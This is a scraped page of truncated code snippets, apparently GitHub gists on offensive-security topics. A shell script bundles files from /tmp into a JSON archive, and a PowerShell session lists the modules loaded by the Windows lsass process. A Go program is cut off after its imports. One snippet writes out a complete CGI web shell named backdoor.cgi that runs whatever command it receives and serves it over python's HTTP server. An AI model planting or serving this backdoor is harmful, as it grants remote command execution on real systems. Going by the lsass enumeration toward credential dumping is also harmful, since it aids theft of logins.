This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SOURCE_DIRECTORY=/tmp | |
ARCHIVE_TO=/tmp/documents.json | |
# Clear the archive. | |
: > "$ARCHIVE_TO" | |
# Begin JSON array. | |
echo -n '[' >> "$ARCHIVE_TO" | |
for FILE in $(grep -lr --exclude="$(basename $ARCHIVE_TO)" . "$SOURCE_DIRECTORY") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cd /tmp | |
mkdir cgi-bin | |
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi | |
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi | |
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi | |
chmod +x ./cgi-bin/backdoor.cgi | |
python -m http.server --cgi | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Start by changing to a temporary directory | |
PS C:\WINDOWS\system32> cd \temp | |
# Run the ps command to get a list of process information for a named process (in this case we use lsass) | |
# Pipe the output to Select-Object ModuleName to limit the output to just the DLLs | |
PS C:\temp> ps -Name lsass -Module | Select-Object ModuleName | |
ModuleName | |
---------- | |
lsass.exe | |
ntdll.dll |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"fmt" | |
"os" | |
"os/exec" | |
"syscall" | |
) | |
func main() { |